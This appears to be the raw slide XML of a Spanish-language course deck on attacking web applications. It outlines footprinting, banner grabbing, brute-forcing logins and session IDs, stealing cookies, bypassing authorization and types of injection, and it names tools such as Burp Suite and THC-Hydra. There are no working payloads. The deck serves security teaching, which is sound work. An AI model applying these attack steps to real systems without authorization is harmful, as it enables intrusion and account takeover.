      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Proporciona información sobre locación de los servidores y asegura que el servidor blanco esté activo en Internet. Whos Lookup, DNS Interrogation, Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Service Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Identificación de puertos comunes, herramientas: nmap, Netscan Tools Pro. Identifica servicios mediante el puerto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382145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000" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Server Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Puerto  	Servicios HTTP Típicos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>80 		WWW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>81		WWW alternativo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>88 		Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008560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3600" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Server Identification/Banner Grabbing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-BO" sz="3600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-BO" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Analiza la respuesta del encabezado del servidor para identificar modelo, versión del Servidor Web. Ayuda a los atacantes a seleccionar los exploits desde base de datos de vulnerabilidades para atacarlos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702943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4000" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Hidden Content Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>No es accesible desde el contenido visible principal para explotar contenido para explotar privilegios de usuario dentro de la aplicación. Permite al atacante recuperar archivos backup, archivos activos, configuraciones, datos sensibles, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Web Spidering: Descubre automáticamente contenido escondido y funcionalidades. Paros, Burp Spider, WebSacarab, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259331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3600" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Hidden Content Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attacker-Directed Spidering: El atacante accede a todas las funcionalidades de las aplicaciones interceptando el proxy para monitorear solicitudes a las respuestas. Poras Proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Brute-Forcing: Herramientas automatizadas como Burp Suite para hacer un gran número de solicitudes al servidor web para adivinar nombres o identificadores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118692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Pila de vulnerabilidad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 7. Aplicaciones Web a medida. Defectos lógicos de negocios, Vulnerabilidades técnicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 6. Componentes de terceros. Open Source/Comercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 5. Base de datos. Oracle/MySQL/MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 4. Web Server. Apache/IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 3. Sistemas Operativos. Windows/Linux/OS X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 2. Red. Router/Swtich</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Pila 1. Seguridad. IPS IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1922362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2. Attack Web Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Luego de identificar el ambiente del servidor web, escanear las vulnerabilidades conocidas en el servidor utilizando un escaneador de vulnerabilidades. Realizar un ataque para explotar las vulnerabilidades identificadas. Lanzar un ataque DoS. Herramientas: UrlScan, Nikto, Nessus, WWWhack, Acunetix, WebInspect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="654173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3. Analize Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Para identificar las superficies de ataque que la expone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Identify Entry Points for User: Revisar la solicitud HTTP generada para identificar puntos de entrada del usuario. Burp proxy, HttPrint, WebSarab, Paros Proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Identify Server-Side Functionality: Observar las aplicaciones reveladas en el cliente para identificar la estructura y funcionalidad de lado del servidor. Teleport Pro, BlackWidow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544694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3. Analize Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Identify Server-Side Technologies: Hacer fingerprint las tecnologías activas en el servidor utilizando varias técnicas como HTTP fingerprinting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Map the Attack Surface: Identificar varias superficies de ataque descubiertas por las aplicaciones y las vulnerabilidades asociadas con cada una.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2649363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4. Attack Authentication Mechanism</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Los atacantes pueden diseñar el exploit y las fallas de implementación en las aplicaciones Web, tales como la insuficiencia de la fortalece de la contraseña o transporte inseguro de las credenciales, para saltar mecanismos de autenticación. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Enumeración de nombre de usuario: Si el estado de login muestra qué parte, si el nombre de usuario o contraseña no es correcta, se puede adivinar los usuarios de la aplicación utilizando el método trial-and-error.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3808593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4. Attack Authentication Mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Ataques de contraseña: Cambiando contraseñas. Determinar la funcionalidad de cambio de contraseña dentro de la aplicación haciendo spidering en la aplicación o creando una cuenta de inicio de sesión. Analizando las cadenas "old password", "new password", "confirm new password" luego analizarlos en búsqueda de vulnerabilidades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0"/>
              <a:t> (continua)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547853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4. Attack Authentication Mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Recuperación de contraseña, "forgot password" generalmente presentan un reto para los usuarios, si el número de intentos no está limitado, el atacante puede adivinar la pregunta reto. Exploit "remember me", son implementadas utilizando una cookie persistente como RememberUser=jason o identificador de sesión persistente RememberUser=ABY112010. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Lista de contraseñas, diccionario de contraseñas, o herramientas como WebCracker, brutus, Burp Insider, THC-Hydra, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Fuerza bruta Burp Suite's Intruder, Brutus y Sensepost's Crowbar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3473033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4. Attack Authentication Mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ataques de sesión: En el primer paso, el atacante recolecta algún valor de ID de sesión olfateando el tráfico desde usuarios autenticados. Los atacantes luego analizan los IDs de sesión para determinar la generación de procesos de generación de ID como la estructura de la ID de sesión, la información que es utilizada para crearla, y luego el algoritmo de encriptación o hash que es utilizado para crearlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" i="1" dirty="0"/>
              <a:t> (continua)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138242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4. Attack Authentication Mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>El atacante puede implementar una técnica de fuerza  bruta para generar y probar distintos valores de ID de sesión hasta que puede obtener acceso a la aplicación. Los mecanismos de generación de sesión vulnerable que utiliza ID de sesión compuesto por un nombre de usuario y otra información predecible como timestamp o dirección IP de cliente puede ser explotado fácilmente adivinando la ID de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3085499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4. Attack Authentication Mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Explotación de cookies: Si la cookie contiene passwords o identificadores de sesión, el atacante puede robar la cookie utilizando técnicas como script injection y eavesdropping. Los atacantes pueden replicar la cookie con el mismo o alterado password o identificador de sesión para saltar la autenticación de la aplicación Web. Los atacantes pueden atrapar cookies utilizando herramientas como Paros Proxy, Burp Suite, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205858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5. Attack Authorization Schemes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Manipulan solicitudes HTTP para subvertir los esquemas de autorización de la aplicación modificando los campos de entrada relacionados al ID de usuario, nombre de usuario, grupo de acceso, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29068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Vectores de ataque Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Es una ruta o medio para que un atacante pueda obtener acceso a la computadora o recursos de la red para realizar un ataque payload o causar resultados maliciosos. Este ataque incluye manipulación de parámetros, XML poisoning, validación de cliente, mala configuración de servidor, problemas de enrutamiento de servicio Web y cross-site scripting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937492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6. Attack Session Management Mechanism</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Los atacantes rompen un mecanismo de administración de sesión de la aplicación saltando los controles de autenticación y haciéndose pasar por usuarios privilegiados de la aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Generación de token de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Predicción</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Manipulación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Manipulación de los tokens de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Session Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Session Replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Ataque MITM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1133833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7. Perform Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>En los ataques de inyección, los atacantes abastecen de entradas maliciosas hechas a mano que son sintácticamente correctas de acuerdo al lenguaje interpretado utilizado para romper la prevención normal de la aplicación. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMTP Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS Commands Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Scripts Injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19183031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8. Attack Data Connectivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
